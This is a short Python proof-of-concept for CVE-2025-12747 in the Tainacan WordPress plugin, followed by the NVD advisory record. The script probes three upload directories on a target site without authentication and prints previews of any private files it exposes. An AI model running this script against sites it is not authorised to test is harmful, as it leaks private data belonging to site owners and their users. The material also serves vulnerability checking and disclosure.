CVE-2025-12747

# CVE-2025-12747 PoC - Tainacan Private File Exposure # Description: Unauthenticated access to private files in wp-content import requests import sys def check_vulnerability(target_url): """ Check if Tainacan private files are exposed Common file paths to check: - wp-content/uploads/tainacan/private/ - wp-content/uploads/tainacan/collections/ """ # Common private file path patterns test_paths = [ f"{target_url}/wp-content/uploads/tainacan/private/", f"{target_url}/wp-content/uploads/tainacan/collections/", f"{target_url}/wp-content/uploads/tainacan/items/" ] results = [] for path in test_paths: try: response = requests.get(path, timeout=10) if response.status_code == 200: results.append({ "path": path, "status": "EXPOSED", "content_preview": response.text[:500] if response.text else "" }) elif response.status_code == 403: results.append({ "path": path, "status": "PROTECTED", "message": "Access denied" }) except requests.RequestException as e: results.append({ "path": path, "status": "ERROR", "message": str(e) }) return results def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-12747_poc.py <target_url>") print("Example: python cve-2025-12747_poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Checking CVE-2025-12747 on {target}") print("[*] Testing private file exposure vulnerability\n") results = check_vulnerability(target) for result in results: print(f"Path: {result['path']}") print(f"Status: {result['status']}") if 'content_preview' in result: print(f"Content Preview: {result['content_preview']}") if 'message' in result: print(f"Message: {result['message']}") print("-" * 50) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-12747", "sourceIdentifier": "[email protected]", "published": "2025-11-21T17:15:50.053", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tainacan plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.0 via uploaded files marked as private being exposed in wp-content without adequate protection. This makes it possible for unauthenticated attackers to extract potentially sensitive information from files that have been marked as private."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://github.com/tainacan/tainacan/blob/2491612ee9d5b14baa70862ba2308ee925de0938/src/classes/class-tainacan-private-files.php", "source": "[email protected]"}, {"url": "https://github.com/tainacan/tainacan/compare/1.0.0...1.0.1", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c64869f0-a4dd-4135-8ed8-a6ff82a48e1f?source=cve", "source": "[email protected]"}]}}